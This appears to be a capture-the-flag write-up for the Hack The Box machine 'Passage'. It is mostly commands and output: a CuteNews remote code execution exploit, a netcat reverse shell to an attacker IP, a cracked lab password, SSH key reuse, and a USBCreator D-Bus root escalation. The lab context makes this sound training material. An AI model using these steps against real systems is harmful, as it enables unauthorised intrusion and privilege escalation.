Passage - [HTB]

Cover Image for Passage - [HTB]

Table of Contents


    Passage is a medium linux machine where the attacker will have to deal firstly with Fail2Ban in order to find the news login portal. Secondly, find a user's credentials in the web page files. Thirdly, using a pair of ssh keys to become another user. And finally, the attacker will have to exploit the USBGenerator service in order to escalate privileges.


    As always I start scanning all open ports in the machine.

    kali@kali:$ sudo nmap -sS -p- -n -oN AllPorts.txt
    Starting Nmap 7.80 ( ) at 2020-10-18 05:55 EDT
    Nmap scan report for
    Host is up (0.044s latency).
    Not shown: 65533 closed ports
    22/tcp open  ssh
    80/tcp open  http
    Nmap done: 1 IP address (1 host up) scanned in 33.18 seconds

    Then a further scan for obtaining more information about each service.

    kali@kali:$ sudo nmap -sC -sV -p22,80 -n -oN PorsDepth.txt
    Nmap scan report for
    Host is up (0.043s latency).
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
    |   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
    |_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Passage News
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 9.66 seconds

    Because, nmap doesn't provide helpful information, let's see what there is in the Apache Server.


    It seems like a blog with several authors. In one of the posts, tells that Fail2Ban (Intrusion prevention software framework that protects computer servers from brute-force attacks.) has being installed to avoid website attacks, so for this machine tools like gobuster or dirbuster are not feasible due to the huge amount of request they do, so our IP will be banned pretty easily.


    Having a look at the rss link (Really Simple Syndication is a web feed that allows users and applications to access updates to websites in a standardized, computer-readable format.) seems like there is another directory named CuteNews.


    Accessing to the directory appears a login portal for CuteNews , a News manager.



    Having a look at searchploit appears several exploits for this version.

    kali@kali:$ searchsploit CuteNews 2.1.2
     Exploit Title                                               |  Path
    CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
    CuteNews 2.1.2 - Arbitrary File Deletion                     | php/webapps/48447.txt
    CuteNews 2.1.2 - Authenticated Arbitrary File Upload         | php/webapps/48458.txt
    CuteNews 2.1.2 - Remote Code Execution                       | php/webapps/
    Shellcodes: No Results
    Papers: No Results

    The valid one is "CuteNews 2.1.2 - Remote Code Execution" which has a post associated to it at so you can learn how to use it. (You only have to execute it with python3 and enter the specified URL http://passage.htb/ )

    kali@kali:$ python3 
               _____     __      _  __                     ___   ___  ___ 
              / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
             / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
             \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                    ___  _________                        
                                   / _ \/ ___/ __/                        
                                  / , _/ /__/ _/                          
    [->] Usage python3
    Enter the URL> http://passage.htb/
    Registering a users
    [+] Registration successful with username: E03jw7jFgS and password: E03jw7jFgS
    Sending Payload
    signature_key: 1bf82733ddc9e91148a30e03c6e841ed-E03jw7jFgS
    signature_dsi: 3c6488b866dd5fff2a26826f29bf44dd
    logged in user: E03jw7jFgS
    Dropping to a SHELL
    command > id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Using netcat we can get our own reverse shell so we can travel for the directories more easily.

    First, we need to put a listen port.

    kali@kali:$ nc -nlvp 4444

    Then, we need to execute the reverse shell using the exploit.

    command > nc -e /bin/bash <IP> 4444

    Finally, in order to use our reverse shell like a proper shell we need to upgrade it, typing the following commands.

    python -c "import pty; pty.spawn('/bin/bash')"
    stty raw -echo
    export TERM=screen
    export SHELL=/bin/bash

    The one thing remaining is that the reverse shell has to have the same number of rows and columns as your terminal, so we can use programs like vim,nano, etc. is running the following commands (The number of rows and columns will vary from computer to computer).

    kali@kali:$ stty -a
    speed 38400 baud; rows 60; columns 235; line = 0;
    intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
    -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
    -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
    opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
    isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
    victim@pwnd:$ stty 60 235

    Inside the /etc/paswd file there are two registered users, which credentials must be found in order to get the user flag.

    www-data@passage:/var/www/html/CuteNews/cdata/users$ grep /bin/bash /etc/passwd
    paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash

    Privilege Escalation 1

    Looking in to the folder /var/www/html/CuteNews/cdata/users there are a lot of files with 64 encoded information on them. Using trial and error inside the files "21.php" and "b0.php" are stored the credentials for the users nadav and paul.







    However, passwords are hashed. Using crackstation the Paul's password can be obtained.


    Then, with the paul's credentials we can obtaine the root.

    www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
    Password:   atlanta1
    paul@passage:~$ wc -c /home/paul/user.txt 
    33 /home/paul/user.txt

    Privilege Escalation 2

    Inside the paul's ssh folder there is a pair public-private keys, which can be used for getting access to the machine through SSH as nadav.

    paul@passage:~$ ls -la .ssh/
    total 24
    drwxr-xr-x  2 paul paul 4096 Jul 21 10:43 .
    drwxr-x--- 16 paul paul 4096 Sep  2 07:18 ..
    -rw-r--r--  1 paul paul  395 Jul 21 10:43 authorized_keys
    -rw-------  1 paul paul 1679 Jul 21 10:43 id_rsa
    -rw-r--r--  1 paul paul  395 Jul 21 10:43
    -rw-r--r--  1 paul paul 1312 Jul 21 10:44 known_hosts
    paul@passage:~$ ssh -i .ssh/id_rsa nadav@localhost
    Last login: Sun Oct 18 07:10:32 2020 from
    nadav@passage:~$ id
    uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

    Privilege Escalation 3

    In the nadav's viminfo file there are two paths, one of them containing the name USBCreator.

    nadav@passage:~$ cat .viminfo
    > /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
            "       12      7
    > /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
            "       2       0
            .       2       0
            +       2       0

    Looking for privilege escalation on the Internet for USBCreator appears this post talking about how to exploit it.

    Finally, executing the following commands we add our ssh keys to the root's authorized keys files so we can ssh to the machine as root obtaining the flag.

    nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true
    nadav@passage:~$ ssh -i .ssh/id_rsa root@localhost
    root@passage:~# wc -c root.txt 
    33 root.txt